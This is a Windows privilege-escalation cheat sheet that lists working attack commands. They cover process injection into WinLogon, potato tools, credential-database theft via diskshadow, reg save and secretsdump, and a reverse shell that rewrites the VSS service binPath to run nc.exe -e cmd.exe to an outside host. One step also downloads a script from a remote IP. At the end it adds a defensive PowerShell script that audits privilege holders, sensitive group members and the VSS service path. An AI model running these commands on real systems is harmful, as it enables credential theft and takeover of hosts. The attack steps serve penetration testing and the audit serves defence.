
Windows Local Privilege Escalation

SeDebugPrivilege

Inject into a privileged process such as WinLogon with ProcessInjection to load adopt.

WinLogon PID: 3488

Adopt binary: adopt.exe

dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\adopt.exe

SeImpersonatePrivilege

IIS (web) service accounts usually have this enabled.

  • GodPotato or PrintSpoofer to privesc.

BackupOperators

cd c:\temp
# Build the diskshadow script (ASCII, one command per line)
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
echo "create" | out-file ./diskshadow.txt -encoding ascii -append
echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
diskshadow.exe /s c:\temp\diskshadow.txt
# Alternative: fetch a prepared diskshadow script instead of building it
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.48/disk.txt", "C:\Windows\Temp\disk.txt")
diskshadow.exe /s C:\Windows\Temp\disk.txt
# Switch to the drive letter the shadow copy was exposed as (z: for the script built above; these notes use E:)
E:
dir windows\ntds
reg save hklm\system c:\windows\temp\system.bak
reg save hklm\sam c:\windows\temp\sam.bak
# upload/download: file-transfer commands of the remote shell session
upload ../../../../../../..//home/kali/tools/SeBackupPrivilege/SeBackupPrivilegeCmdLets.dll
upload ../../../../../../..//home/kali/tools/SeBackupPrivilege/SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
cd c:\windows\temp
download ntds.dit
download sam.bak
download system.bak
# On the attacker host (lmhash:nthash are placeholders)
impacket-secretsdump -ntds ntds.dit -system system.bak -hashes lmhash:nthash LOCAL -outputfile ntlm-extract

Server Operators

upload /usr/share/windows-resources/binaries/nc.exe
# sc.exe requires a space after "binPath="; ip and 1234 are placeholders
sc.exe config vss binPath= "C:\Path\nc.exe -e cmd.exe ip 1234"
sc.exe stop vss
sc.exe start vss
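As an added defender-side check (not part of the original cheat sheet), the following PowerShell audits on one host the three conditions the notes above rely on: which principals hold SeDebugPrivilege, SeImpersonatePrivilege and SeBackupPrivilege, who sits in Backup Operators and Server Operators, and whether the VSS service still points at vssvc.exe. The group names and the expected vssvc.exe location are assumptions for an English-language Windows install; run it from an elevated prompt.

```powershell
# Added audit example, not code from the original page.
# Assumes English group names and a default %SystemRoot%\system32\vssvc.exe.

function Get-PrivilegeHolders {
    # Export the local User Rights Assignment with secedit and resolve the
    # SIDs granted each privilege of interest back to account names.
    param([string[]]$Privileges = @('SeDebugPrivilege', 'SeImpersonatePrivilege', 'SeBackupPrivilege'))
    $cfg = Join-Path $env:TEMP 'rights-audit.inf'
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    $lines = Get-Content $cfg
    Remove-Item $cfg -ErrorAction SilentlyContinue
    foreach ($priv in $Privileges) {
        $line = $lines | Where-Object { $_ -match "^$priv\s*=" }
        $names = foreach ($entry in (($line -replace '^.*=\s*', '') -split ',')) {
            $id = $entry.Trim().TrimStart('*')      # entries look like *S-1-5-32-544
            if (-not $id) { continue }
            try { (New-Object Security.Principal.SecurityIdentifier $id).Translate([Security.Principal.NTAccount]).Value }
            catch { $id }                           # keep the raw SID if it cannot be resolved
        }
        [pscustomobject]@{ Privilege = $priv; Holders = ($names -join ', ') }
    }
}

function Get-SensitiveGroupMembers {
    # Backup Operators and Server Operators are the groups abused above;
    # Server Operators only exists on a domain controller, so errors are reported, not fatal.
    foreach ($g in 'Backup Operators', 'Server Operators') {
        try { $m = (Get-LocalGroupMember -Group $g -ErrorAction Stop).Name -join ', ' }
        catch { $m = "(could not enumerate: $($_.Exception.Message))" }
        [pscustomobject]@{ Group = $g; Members = $m }
    }
}

function Test-VssServicePath {
    # A reconfigured binPath (sc.exe config vss ...) leaves a non-standard image path behind.
    $svc = Get-CimInstance Win32_Service -Filter "Name='VSS'"
    $actual = [Environment]::ExpandEnvironmentVariables($svc.PathName).Trim('"')
    $expected = Join-Path $env:SystemRoot 'system32\vssvc.exe'
    [pscustomobject]@{ Service = 'VSS'; Path = $actual; Tampered = ($actual -ine $expected) }
}

Get-PrivilegeHolders      | Format-Table -AutoSize
Get-SensitiveGroupMembers | Format-Table -AutoSize
Test-VssServicePath       | Format-List
```

Any holder of these privileges, group member, or VSS image path you cannot account for is worth a closer look, since each maps directly to one of the escalation paths listed above.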